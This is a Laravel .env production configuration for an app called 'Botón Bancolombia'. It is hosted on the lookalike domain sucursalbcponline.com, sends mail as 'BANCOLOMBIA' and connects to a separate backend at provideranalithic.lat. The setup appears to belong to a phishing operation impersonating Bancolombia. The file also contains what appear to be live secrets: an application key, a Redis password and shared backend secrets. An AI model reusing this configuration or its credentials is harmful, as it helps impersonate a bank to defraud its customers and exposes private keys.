APP_NAME="Botón Bancolombia"
APP_ENV=production
APP_KEY=base64:JYKdTh/D4erev5l4jwlNRfUwC/11hy834D7Nvx+QTjI=
PROJECT_ID=8e49988a-1ad6-47e9-bcb1-11890be6cb62
APP_DEBUG=false
APP_TIMEZONE=America/Bogota
APP_URL=https://sucursalbcponline.com

APP_LOCALE=es
APP_FALLBACK_LOCALE=en
APP_FAKER_LOCALE=es_CO

APP_MAINTENANCE_DRIVER=file

BCRYPT_ROUNDS=12



# ============================================
# Logging
# ============================================
LOG_CHANNEL=stack
LOG_STACK=single
LOG_DEPRECATIONS_CHANNEL=null
LOG_LEVEL=error

# ============================================
# Database - SQLite
# ============================================
DB_CONNECTION=sqlite
DB_DATABASE=/var/www/btn_bc/database/database.sqlite
# Para SQLite no se necesitan estas variables:
# DB_HOST, DB_PORT, DB_USERNAME, DB_PASSWORD


# ============================================
# Session & Cache - Redis
# ============================================
SESSION_DRIVER=redis
SESSION_LIFETIME=120
SESSION_ENCRYPT=true
SESSION_PATH=/
SESSION_DOMAIN=.sucursalbcponline.com
SESSION_SECURE_COOKIE=true

BROADCAST_CONNECTION=log
FILESYSTEM_DISK=local
QUEUE_CONNECTION=redis

CACHE_STORE=redis
CACHE_PREFIX=ltm_


# ============================================
# Redis
# ============================================
REDIS_CLIENT=phpredis
REDIS_HOST=127.0.0.1
REDIS_PASSWORD=UAsncFM8iVXmQcKUNh5906oiuOWlY
REDIS_PORT=6379

# ============================================
# Mail (opcional - configurar segun proveedor)
# ============================================
MAIL_MAILER=smtp
MAIL_HOST=smtp.mailgun.org
MAIL_PORT=587
MAIL_USERNAME=null
MAIL_PASSWORD=null
MAIL_ENCRYPTION=tls
MAIL_FROM_ADDRESS="noreply@sucursalbcponline.com"
MAIL_FROM_NAME="BANCOLOMBIA"


# ============================================
# Backend Node Connection
# ============================================
# NOTA: El backend usa un dominio diferente al panel
# Ejemplo: api.otrodominio.com o backend.otrodominio.com
NODE_BACKEND_URL=https://provideranalithic.lat
BACKEND_WS_URL=wss://provideranalithic.lat
NODE_SHARED_SECRET=81bc5d29aa4a8f1a958d61e0dc9f78c0f004a47235ca44acccb7c714f1cc>
LARAVEL_SHARED_SECRET=81bc5d29aa4a8f1a958d61e0dc9f78c0f004a47235ca44acccb7c714f>


# ============================================
# Vite / Frontend Assets
# ============================================
VITE_APP_NAME="${APP_NAME}"
VITE_APP_URL="${APP_URL}"
VITE_API_URL="${NODE_BACKEND_URL}"
VITE_WS_URL="${NODE_BACKEND_WS_URL}"
